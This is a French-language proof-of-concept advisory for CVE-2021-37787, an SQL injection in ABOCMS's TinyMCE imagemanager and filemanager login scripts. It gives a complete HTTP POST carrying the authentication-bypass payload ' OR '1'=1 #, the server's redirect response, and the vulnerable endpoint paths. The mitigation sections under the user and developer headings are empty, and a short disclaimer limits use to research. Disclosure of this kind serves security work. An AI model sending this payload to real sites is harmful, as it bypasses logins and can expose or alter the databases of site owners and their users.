
CVE-2021-37787
Une vulnérabilité critique d'injection SQL existe dans ABOCMS au sein du module TinyMCE. La vulnérabilité provient d'une désinfection insuffisante des entrées dans l'interaction du module TinyMCE avec la base de données, permettant à un attaquant d'injecter des requêtes SQL malveillantes. Cela peut conduire à un accès non autorisé aux données, à leur modification, voire à une compromission totale de la base de données sous-jacente.
Le point de terminaison vulnérable se situe dans le traitement par le module TinyMCE des entrées fournies par l'utilisateur. Un attaquant peut exploiter cette faille pour exécuter des commandes SQL arbitraires.
POST /js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php HTTP/1.1
Host: <yourdomain.name>
Content-Type: application/x-www-form-urlencoded
return_url=%2Fjs%2Fadmin%2Ftiny_mce%2Fplugins%2Fimagemanager%2Findex.php%3Ftype%3Dim%26page%3Dindex.html&login=1%27+OR+%271%27%3D1+%23&password=1&submit_button=Login
HTTP/1.1 302 Found
Server: nginx-reuseport/1.21.1
Date: <date>
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
A-Powered-By: ABO.CMS 5.9.3 (fe01ce2a7fbac8fafaed7c982a04e229)
location: /js/admin/tiny_mce/plugins/imagemanager/index.php?type=im&page=index.html
La vulnérabilité peut être déclenchée via le point de terminaison suivant :
/js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php /js/admin/tiny_mce/plugins/filemanager/login_session_auth.php
Pour les utilisateurs :
Pour les développeurs :
Cette preuve de concept est fournie à des fins éducatives et de recherche en sécurité uniquement. N'utilisez pas ce code pour nuire à des systèmes ou des réseaux sans autorisation explicite du propriétaire. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par cette preuve de concept.